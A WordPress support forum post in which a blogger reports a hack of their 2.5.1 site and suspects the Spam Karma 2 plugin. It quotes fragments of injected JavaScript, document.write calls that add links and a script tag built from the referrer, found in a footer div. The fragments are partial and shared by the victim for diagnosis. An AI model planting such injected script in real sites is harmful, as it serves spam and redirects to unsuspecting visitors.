Support » Plugins » Hacked via the Spam Karma 2 (SK2) plugin?

  • My 2.5.1 blog was hacked recently, adding links to and other places. A malicious script was running in a div near the footer of the blog:

    document.write("<H1><a href='"+escape(document.referrer)+"'>Proceed to results</a></H1>");
    document.write(" src=\""+escape(document.referrer)+"\"\>");
    </script><h1><a href="{my blog's URL}/">Proceed to results</a></h1><script src=" ...

    And so on.

    When I tried to find how it had been done, I traced the hack to my plugins. To my surprise, disabling Spam Karma 2 foiled the hack.

    Has anyone encountered this hack before? I’m not sure if it is SK2 itself or one of its plugins, but something is not right.

    And yeah, I feel less secure without SK2, but how can I trust it anymore?


  • The topic ‘Hacked via the Spam Karma 2 (SK2) plugin?’ is closed to new replies.